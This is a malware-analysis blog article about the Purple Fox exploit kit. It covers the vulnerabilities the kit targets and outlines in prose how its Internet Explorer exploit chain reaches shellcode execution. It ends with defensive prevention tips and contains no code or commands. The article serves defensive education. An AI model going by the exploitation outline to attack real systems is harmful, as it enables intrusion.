Malware analysis

Purple Fox malware: What it is, how it works and how to prevent it

Greg Belding
September 16, 2020 by
Greg Belding

Without question, there has been a marked die-off in the usage of Exploit Kits (EK). The Purple Fox exploit kit is a type of malware that is defying this recent trend and has had some new life breathed into it. This slightly stale malware formerly used a third-party EK to achieve its operator’s malicious goals; the new variant of this malware recently had some new Microsoft exploits added to its arsenal. This is typical behavior, and EK operators are trying to ensure its success in the face of weekly updates. 

This article will explore Purple Fox and detail what it is, how it works and how you can prevent it. It may be true that EKs are falling to the wayside in the face of other malware, but Purple Fox is demonstrating that there is still a place at the table for EKs.

 

What is Purple Fox?

Originally a fileless downloader malware (Trojan), Purple Fox was delivered by another EK named RIG and infected at least 30,000 systems. In 2019, it shifted to Windows PowerShell to deliver and retrieve malware and its operators made it the replacement of the RIG EK. 

This means the Purple Fox malware family no longer has to use a third-party EK in attack campaigns and proves that EKs are still an aspect of the threat landscape that needs to be taken seriously. It also highlights that malware is essentially treated like a business, with development being moved in-house to save money.

Targeting vulnerabilities is not a new functionality for Purple Fox, as it has been observed targeting CVE-2018-15982, CVE-2014-6332, CVE-2018-8174, CVE-2015-1701 and CVE-2018-8120 in its original variant. The new and improved variant was first observed in September 2019, loaded with two new high-severity, critical Microsoft exploits. 

The first of these, CVE-2019-1458, allows for local privilege elevation mobility in Windows. The second, CVE-2020-0674, is an Internet Explorer vulnerability. Microsoft has since patched both of these vulnerabilities. This demonstrates that Purple Fox’s operators are staying on top of current vulnerabilities and updating the malware when new ones become available, according to ProofPoint researchers.

The primary purpose of Purple Fox is to distribute other malware onto systems it infects. These types of malware include Trojans, information stealers, ransomware and cryptominers owned and operated by what has been dubbed the Purple Fox gang.

How does Purple Fox work?

The main goal of this malware, like other EKs, is to exploit vulnerabilities so that Purple Fox can run PowerShell to download additional malware onto the compromised system. How this works for initial infection is that typically, the user visits a malicious site containing Purple Fox EK. If the user has unpatched vulnerabilities that Purple Fox targets, the malware is covertly downloaded while the user is on the malicious site. Normally, traffic to these malicious sites are driven by redirects from malicious advertisements (malvertising) and via phishing emails.

Once infection has taken root (in the case of the Windows 10 Internet Explorer exploit CVE-2020-0674), Purple Fox targets the web browser’s use of jscript.dll, a library that the Windows OS needs in order to operate. The malware then proceeds to leak an address from RegExp located with jscript.dll. The malicious JavaScript code then looks for the jscript.dll PE header, which is used to locate the kernel32.dll import descriptor that houses the memory and process manipulation the Purple Fox EK used to load its shellcode. This shellcode then finds WinExec and creates the process that actually begins the malware’s execution.

After execution, Purple Fox has been observed using its rootkit capability to hide its registry entries and files after the compromised system is restarted. To enable its rootkit components, this malware abuses open-source code as well as its file utility software. This allows Purple Fox to hide its DLL to stymie reverse-engineering and cracking attempts that information security professionals may be engaging in if Purple Fox has been detected.

How to prevent Purple Fox

All of this malware activity, as scary as it may seem, was all caused by the simple act of an unpatched system being used to visit a malicious site. It should be noted that prevention is definitely possible, and like the method of infection, also fairly easy to accomplish.

Below are some tips that will help prevent your system from falling victim to Purple Fox.

  • One of the new exploits added to Purple Fox is CVE-2019-1458, which allows for local privilege elevation mobility. Purple Fox prevention is centered in part on enforcing the principle of least privilege. Securing the use of, and restricting privileges to, administrator tools is paramount to enforcing the principle of least privilege
  • The most obvious advice toward Purple Fox prevention is regularly updating and patching your system(s)
  • Adding more advanced layers of security to your network will enrich your Purple Fox prevention capability. Consider adding anti-malware solutions that use behavior monitoring and strengthen your intrusion and detection capabilities with security solutions that use AI/machine learning
  • Never neglect your cybersecurity awareness training — make sure to touch on the fact that EKs are still out there in the wild and are still a threat

Conclusion

Exploit Kits (EK) used to be one of the most popularly used types of malware in years past. Lately, they have gone the way of dial-up — essentially phased out by other malware and tools that can do what EKs do and more. Purple Fox is an EK that uses the tried-and-true practice of regularly updating itself with new exploits to stay ahead of the pack of compromised system candidates. 

If you use the tips given above, your system will stand apart from this pack and Purple Fox will be stopped in its tracks.

Become a certified reverse engineer!

Become a certified reverse engineer!

Get live, hands-on malware analysis training from anywhere, and become a Certified Reverse Engineering Analyst.

Sources

Greg Belding
Greg Belding

Greg is a Veteran IT Professional working in the Healthcare field. He enjoys Information Security, creating Information Defensive Strategy, and writing – both as a Cybersecurity Blogger as well as for fun.